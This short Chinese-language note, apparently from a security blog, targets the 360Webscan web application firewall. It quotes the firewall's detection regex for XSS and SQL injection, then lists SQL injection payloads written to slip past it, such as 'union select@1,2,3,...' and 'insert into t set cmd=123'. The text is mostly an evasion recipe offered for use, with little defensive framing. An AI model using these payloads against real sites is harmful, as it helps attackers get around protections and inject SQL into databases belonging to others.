360Webscan Bypass
来到select正则:
1
|
\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b( and | or )\b\s*?([\(\) '"\d]+?=[\(\)' "\d]+?|[\(\) '"a-zA-Z]+?=[\(\)' "a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?[ "'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|'|" ).*?(`| '|"))|UPDATE@{0,2}(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|' |").*?(`| '|"))FROM(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|\/\*.*?\*\/|' |
Bypass:
union select@1,2,3,4,5,6,7
union select@1=@1,2,3,4,5,6,7
insert正则部分:
1
|
INSERT\s+INTO.+?(VALUES|SET) |
Bypass:
insert into t set cmd=123